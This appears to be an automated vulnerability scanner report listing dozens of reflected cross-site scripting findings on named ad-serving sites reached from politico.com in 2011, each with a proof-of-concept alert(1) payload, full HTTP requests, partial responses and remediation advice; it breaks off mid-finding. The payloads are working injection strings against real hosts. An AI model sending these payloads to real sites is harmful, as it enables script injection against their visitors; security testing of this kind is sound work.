Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:30:40 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Content-Length: 3420 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1387828c7df2--><script>alert(1)</script>aa10569b39e" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload ffb30--><script>alert(1)</script>338e101eb1d was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:31:03 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Content-Length: 3859 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1ffb30--><script>alert(1)</script>338e101eb1d" -->
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c41c'-alert(1)-'5514d5e74be was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x2507c41c'-alert(1)-'5514d5e74be§ion=1921728&referrer=http://www.politico.com/index.html HTTP/1.1 Host: adserving.cpxinteractive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/index.html
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:42:54 GMT Content-Length: 446
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 841ee'-alert(1)-'b206036ced2 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250§ion=1921728841ee'-alert(1)-'b206036ced2&referrer=http://www.politico.com/index.html HTTP/1.1 Host: adserving.cpxinteractive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/index.html
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:43:04 GMT Content-Length: 446
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 27705<script>alert(1)</script>7547e8e3a83 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9c756<script>alert(1)</script>098041de254 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 10d82<script>alert(1)</script>361b9bb5076 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8617f<script>alert(1)</script>a248be74c7f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fbe3c<script>alert(1)</script>bedb297f23f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8430<script>alert(1)</script>d63b8fdb4e0 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3f385<script>alert(1)</script>943c461294 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 3b297<script>alert(1)</script>70c3d1f0ea5 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7bd68<script>alert(1)</script>202b4b7f415 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 76a4e<script>alert(1)</script>c98d370326b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f249"><script>alert(1)</script>9d0a7ef868d was submitted in the ci parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f54"><script>alert(1)</script>846dc866363 was submitted in the ei parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e929"><script>alert(1)</script>558d47ebcdd was submitted in the ob parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the E request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e5e'%3balert(1)//5cf0b169852 was submitted in the E parameter. This input was echoed as a7e5e';alert(1)//5cf0b169852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/cse?a=J&b=559602&E=a7e5e'%3balert(1)//5cf0b169852&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=&S=15&V=2&W=728 HTTP/1.1 Host: connexity.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/index.html
<!-- iframe-pre-script.inc.html --> <html><head> <script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><script type="text/javascript"> var sid='15'; var fid='1'; var width=728; var height=90; var tid='0-3fd05f20'; var loadtest=false; var nextOp = 'I'; var TPC='a7e5e';alert(1)//5cf0b169852'; var lsoAllowed=false; var lsoRefresh=true; var flashSupported=true; var optOutPresent=false; var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137'; var cdn_root='t.cxt.ms/'; var cse_ro ...[SNIP]...
The value of the J request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2db3'%3balert(1)//e59c7adcdb7 was submitted in the J parameter. This input was echoed as d2db3';alert(1)//e59c7adcdb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.htmld2db3'%3balert(1)//e59c7adcdb7&L=&S=15&V=2&W=728 HTTP/1.1 Host: connexity.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/index.html
<!-- iframe-pre-script.inc.html --> <html><head> <script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri ...[SNIP]... UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137'; var cdn_root='t.cxt.ms/'; var cse_root='connexity.net/c/cse'; var ssl=false; var ref='empty'; var refr='http://www.politico.com/index.htmld2db3';alert(1)//e59c7adcdb7'; </script> ...[SNIP]...
The value of the L request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8753f'%3balert(1)//024f217ec36 was submitted in the L parameter. This input was echoed as 8753f';alert(1)//024f217ec36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=8753f'%3balert(1)//024f217ec36&S=15&V=2&W=728 HTTP/1.1 Host: connexity.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/index.html
<!-- iframe-pre-script.inc.html --> <html><head> <script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri ...[SNIP]... flashSupported=true; var optOutPresent=false; var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137'; var cdn_root='t.cxt.ms/'; var cse_root='connexity.net/c/cse'; var ssl=false; var ref='8753f';alert(1)//024f217ec36'; var refr='http://www.politico.com/index.html'; </script> ...[SNIP]...
The value of the AdSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12a72'%3balert(1)//0adbbbb611e was submitted in the AdSize parameter. This input was echoed as 12a72';alert(1)//0adbbbb611e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Mon, 31 Oct 2011 19:04:17 GMT Server: Microsoft-IIS/6.0 p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 895 Content-Type: text/html Expires: Mon, 31 Oct 2011 19:03:17 GMT Cache-control: no-cache CI_SVR_ID: 11/69 Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:14:17 GMT;path=/;httponly
<html><head> <title>Coupons.com</title> </head> <body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'> <SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x 21012a72';alert(1)//0adbbbb611e - SITE CODE REQUIRED : SECTION CODE REQUIRED - DO NOT MODIFY --> ...[SNIP]...
The value of the npage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783ab'%3balert(1)//16595f62d8f was submitted in the npage parameter. This input was echoed as 783ab';alert(1)//16595f62d8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pzn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e09b'%3balert(1)//407021f8be4 was submitted in the pzn parameter. This input was echoed as 4e09b';alert(1)//407021f8be4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the spage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4adc'%3balert(1)//eaf4aa2dc00 was submitted in the spage parameter. This input was echoed as e4adc';alert(1)//eaf4aa2dc00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2d3"-alert(1)-"15561a177f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.comce2d3"-alert(1)-"15561a177f2/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=605B87974EE3B7D84553DEC5CCF31F92; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:32:00 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 598d5"-alert(1)-"286b77b0405 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794598d5"-alert(1)-"286b77b0405/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=AB4A1D48099BCAE3AB902FC6F3BC78C9; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:32:00 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42202"-alert(1)-"315bbf99bf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/18497942202"-alert(1)-"315bbf99bf2/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=863AA0BD61A78A7BB73DA7B19CB5C588; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:32:01 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3723"-alert(1)-"86da9ead8b1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServeb3723"-alert(1)-"86da9ead8b1/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5279BF91DE610D58DA9B8A67BF08C219; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:32:00 GMT Connection: close
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f12a5"-alert(1)-"4cae985354f was submitted in the flash parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10f12a5"-alert(1)-"4cae985354f&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=89D1E63635A9A549E99B2C87A565B70C; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:58 GMT Connection: close
3.47. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fw.adsafeprotected.com
Path:
/rjss/ads.pointroll.com/10794/184979/PortalServe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbce9"-alert(1)-"c20e75cf945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639&fbce9"-alert(1)-"c20e75cf945=1 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3CE2B0610A4BA16DB8EDA52217788F23; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:59 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d2da"-alert(1)-"963b56b754 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P115201109261748194d2da"-alert(1)-"963b56b754&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D7A71FF0BF0D0B647E91AD84AEA59DEF; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:57 GMT Connection: close
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e89b"-alert(1)-"8fb850ab93d was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC520905e89b"-alert(1)-"8fb850ab93d&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=97A7E8CF12C148F43D7B5BB33AF435AE; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:57 GMT Connection: close
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 306ae"-alert(1)-"7022657cf22 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639306ae"-alert(1)-"7022657cf22 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=99E968F6C4A31A3325A220CFA2D7A833; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:59 GMT Connection: close
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67253"-alert(1)-"ef60871d9b9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$67253"-alert(1)-"ef60871d9b9&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7F4663C198D0BB0547DCD36B6B1AA789; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:59 GMT Connection: close
The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72cbe"-alert(1)-"0d58657472 was submitted in the time parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
